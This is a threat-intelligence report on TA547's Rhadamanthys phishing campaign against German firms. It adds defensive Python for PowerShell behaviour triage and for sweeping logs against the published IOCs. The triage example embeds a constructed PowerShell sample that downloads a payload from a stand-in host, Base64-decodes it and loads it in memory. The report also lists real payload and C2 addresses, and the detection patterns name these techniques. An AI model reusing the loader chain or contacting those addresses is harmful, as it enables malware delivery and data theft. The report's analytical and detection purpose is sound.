Threat actor TA547 launched an email phishing campaign in Germany using Rhadamanthys malware, a new information stealer in their arsenal. The emails impersonated German retail giant Metro with invoice-themed subjects and attachments containing password-protected ZIP files.
Each ZIP contained an LNK file; running it launched PowerShell, which downloaded and executed a remote script. Proofpoint assessed that the script was likely written with the help of a large language model. The campaign also illustrates how TA547's tradecraft is shifting: compressed LNKs as the delivery mechanism and Rhadamanthys as the payload.
The campaign targeted German organizations across many industries. Every email carried a password-protected ZIP; opening it and running the enclosed LNK triggered a malicious PowerShell script.
The script carried the Rhadamanthys executable as a Base64-encoded string, decoded it, and loaded it in memory, so the binary was never written to disk. Unusually, the script was commented throughout with grammatically correct, highly specific comments, which suggests it was produced with an LLM-enabled tool.
Large language models (LLMs) can be used to create malicious content, and telling machine output from human writing is difficult, although the content itself offers clues: machine-generated text often shows characteristics human writing lacks, such as repetitive phrasing and unnatural language.
Spotting those signs is not essential for defense. Regardless of who or what wrote the content, the methods for protecting against it remain the same.
TA547 is a financially motivated initial access broker (IAB) that targets multiple regions with information stealers. Since 2023 its primary payload has been NetSupport RAT, but it has also delivered StealC and Lumma Stealer.
Its delivery method shifted from zipped JavaScript attachments in 2023 to compressed LNKs in March 2024, and its campaigns have targeted organizations in Germany, Spain, Switzerland, Austria, and the US.
Beyond the compressed LNKs and the new Rhadamanthys payload, the campaign points to a possible emerging trend: threat actors using content most likely produced by large language models (LLMs) in their attacks.
LLMs could help attackers understand existing attack chains and adapt those techniques to their own purposes; like LLM-generated social engineering lures, such scripts can be folded into a broader malicious campaign.
In this case the suspected LLM-generated content was the delivery script, not the malware itself, and it changed nothing about how security tools defend against it. Most detections key on behavior, so the origin of the code does not affect detection.
Machine-generated malware code trips the same defenses when it executes, just as LLM-generated phishing emails do despite mimicking human writing.
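To make the behavior-first point concrete, here is an added example (written for this page, not Proofpoint's or TA547's code) that scores PowerShell script text on the download, Base64-decode and in-memory-load indicators the text describes, and separately measures the tidy comment style that raised the LLM suspicion. The indicator patterns, weights, threshold and both sample scripts are constructed assumptions; the malicious sample only mimics the chain described above and is not the real script.

```python
"""Behaviour-based triage of PowerShell script text (for example the
ScriptBlockText of an Event ID 4104 record), plus a comment-style heuristic.

Added example for this page. The two scripts below are constructed for the
example and are NOT the TA547 script; indicator names, weights and the
threshold are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Behavioural indicators of the download -> Base64-decode -> run-in-memory
# chain described in the text. (name, pattern, weight) are assumptions.
INDICATORS = [
    ("remote_download",
     re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadData|"
                r"Net\.WebClient|Start-BitsTransfer", re.I), 2),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("in_memory_load",
     re.compile(r"Reflection\.Assembly\]::Load\b|\.EntryPoint\.Invoke\b|"
                r"VirtualAlloc", re.I), 3),
    ("dynamic_eval", re.compile(r"\bInvoke-Expression\b|\biex\b", re.I), 2),
    ("hidden_window", re.compile(r"-WindowStyle\s+Hidden|-w\s+hidden\b", re.I), 1),
    ("policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass|-ep\s+bypass\b", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 5  # assumption: a download alone is not enough


@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)
    comment_ratio: float = 0.0           # commented lines / non-blank lines
    sentence_comment_ratio: float = 0.0  # comments that read as full sentences

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def comment_stats(script: str):
    """Return (comment_ratio, sentence_comment_ratio) for a script.

    A 'sentence-like' comment starts with a capital letter, ends with a
    period and has at least four words: the tidy style the text says
    stood out in the TA547 script. This is weak evidence on its own.
    """
    lines = [l.strip() for l in script.splitlines() if l.strip()]
    comments = [l[1:].strip() for l in lines if l.startswith("#")]
    if not lines:
        return 0.0, 0.0
    ratio = len(comments) / len(lines)
    if not comments:
        return ratio, 0.0
    sentence_like = [c for c in comments
                     if c and len(c.split()) >= 4 and c[0].isupper() and c.endswith(".")]
    return ratio, len(sentence_like) / len(comments)


def triage(script: str) -> Verdict:
    """Score a script on behaviour first; record comment style separately."""
    v = Verdict()
    for name, pattern, weight in INDICATORS:
        if pattern.search(script):
            v.hits.append(name)
            v.score += weight
    v.comment_ratio, v.sentence_comment_ratio = comment_stats(script)
    return v


# Constructed sample modelled on the chain in the text (not the real script).
MALICIOUS_SAMPLE = """
# Download the encoded payload from the staging server.
$resp = Invoke-WebRequest -Uri "https://staging.example.invalid/g.txt" -UseBasicParsing
# Decode the Base64 string into a byte array.
$bytes = [System.Convert]::FromBase64String($resp.Content)
# Load the assembly directly into memory and run its entry point.
$asm = [System.Reflection.Assembly]::Load($bytes)
$asm.EntryPoint.Invoke($null, @())
"""

# Constructed benign admin script: one download, nothing decoded or loaded.
BENIGN_SAMPLE = """
# build helper
$files = Get-ChildItem -Path .\\src -Filter *.ps1
foreach ($f in $files) { Write-Host $f.Name }
Invoke-WebRequest -Uri "https://example.invalid/notes.txt" -OutFile notes.txt
"""

if __name__ == "__main__":
    for label, s in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        v = triage(s)
        print(f"{label}: score={v.score} suspicious={v.suspicious} hits={v.hits} "
              f"comments={v.comment_ratio:.2f} sentence_like={v.sentence_comment_ratio:.2f}")
```

The verdict is driven entirely by behaviour: the constructed malicious sample is flagged because it downloads, decodes and loads an assembly in memory, while the benign script's single download stays below the threshold. The comment statistics are reported alongside but never feed the score, which matches the text's point that a well-commented script is a curiosity for attribution, not a detection signal.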
Proofpoint's Emerging Threats (ET) signatures flagged possible Rhadamanthys stealer activity: an observed SSL certificate (2854802), a data exfiltration attempt (2853002), a payload response (2853001), and a download request (2043202).
Proofpoint also published indicators of compromise (IOCs) for the campaign, observed on March 26, 2024: the PowerShell payload URL hxxps://bolibachan[.]com/g[.]txt and Rhadamanthys command-and-control (C2) infrastructure at indscpm[.]xyz and 94.131.104.223:443.
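The IOCs above are published defanged, so before they can be swept against logs they need to be refanged and normalised into URLs, domains and IP:port endpoints. The following added example (not part of the page or of Proofpoint's tooling) does that and matches the result against a few constructed proxy and DNS log lines, including a subdomain of the C2 domain and the C2 IP on a different port. The log lines and their format are assumptions.

```python
"""Refang the page's defanged IOCs and sweep constructed proxy/DNS log lines.

Added example for this page; the log lines are constructed, not real traffic.
"""
import re
from urllib.parse import urlparse

# IOCs exactly as published (defanged) in the text.
DEFANGED_IOCS = [
    "hxxps://bolibachan[.]com/g[.]txt",   # PowerShell payload URL
    "indscpm[.]xyz",                      # Rhadamanthys C2 domain
    "94.131.104.223:443",                 # Rhadamanthys C2 IP:port
]

# Constructed log lines: "<timestamp> <client> <verb> <target> [status]".
LOG_LINES = [
    "2024-03-26T09:58:41Z 10.0.0.15 DNS A indscpm.xyz",
    "2024-03-26T09:58:42Z 10.0.0.15 GET https://bolibachan.com/g.txt 200",
    "2024-03-26T09:58:50Z 10.0.0.15 CONNECT 94.131.104.223:443",
    "2024-03-26T09:59:02Z 10.0.0.22 GET https://www.example.com/index.html 200",
    "2024-03-26T09:59:10Z 10.0.0.22 DNS A cdn.indscpm.xyz",
    "2024-03-26T09:59:11Z 10.0.0.22 CONNECT 94.131.104.223:8443",
]

IP_PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?$")
HOST = re.compile(r"^[a-z0-9.-]+\.[a-z]{2,}$", re.I)


def refang(ioc: str) -> str:
    """Undo the common defanging conventions: hxxp -> http, [.] -> ., [:] -> :."""
    s = re.sub(r"^hxxp", "http", ioc.strip(), flags=re.I)
    return s.replace("[.]", ".").replace("[:]", ":")


def build_matcher(defanged):
    """Split refanged IOCs into URL, domain and (ip, port) sets."""
    urls, domains, endpoints = set(), set(), set()
    for ioc in defanged:
        s = refang(ioc)
        if "://" in s:
            urls.add(s.lower())
            domains.add(urlparse(s).hostname.lower())  # the URL's host is an IOC too
        elif (m := IP_PORT.match(s)):
            endpoints.add((m.group(1), int(m.group(2)) if m.group(2) else None))
        else:
            domains.add(s.lower())
    return urls, domains, endpoints


def domain_hit(host: str, domains) -> bool:
    """Exact match or any subdomain of an IOC domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan(lines, defanged=DEFANGED_IOCS):
    """Return {line_index: sorted list of matched indicator kinds}."""
    urls, domains, endpoints = build_matcher(defanged)
    hits = {}
    for i, line in enumerate(lines):
        found = set()
        for tok in line.split():
            if "://" in tok:
                if tok.lower() in urls:
                    found.add("url")
                if domain_hit(urlparse(tok).hostname or "", domains):
                    found.add("domain")
            elif (m := IP_PORT.match(tok)):
                ip, port = m.group(1), int(m.group(2)) if m.group(2) else None
                # An IOC with no port matches any port; 443 here means 443 only.
                if any(ip == e_ip and (e_port is None or e_port == port)
                       for e_ip, e_port in endpoints):
                    found.add("ip")
            elif HOST.match(tok) and domain_hit(tok, domains):
                found.add("domain")
        if found:
            hits[i] = sorted(found)
    return hits


if __name__ == "__main__":
    for idx, kinds in scan(LOG_LINES).items():
        print(f"line {idx}: {kinds} <- {LOG_LINES[idx]}")
```

Note that the last constructed line, the C2 IP on port 8443, is deliberately not matched because the published indicator pins port 443; whether to widen an IP:port IOC to the bare address is a judgement call for the analyst, and the example keeps the published precision so the decision is visible rather than silent.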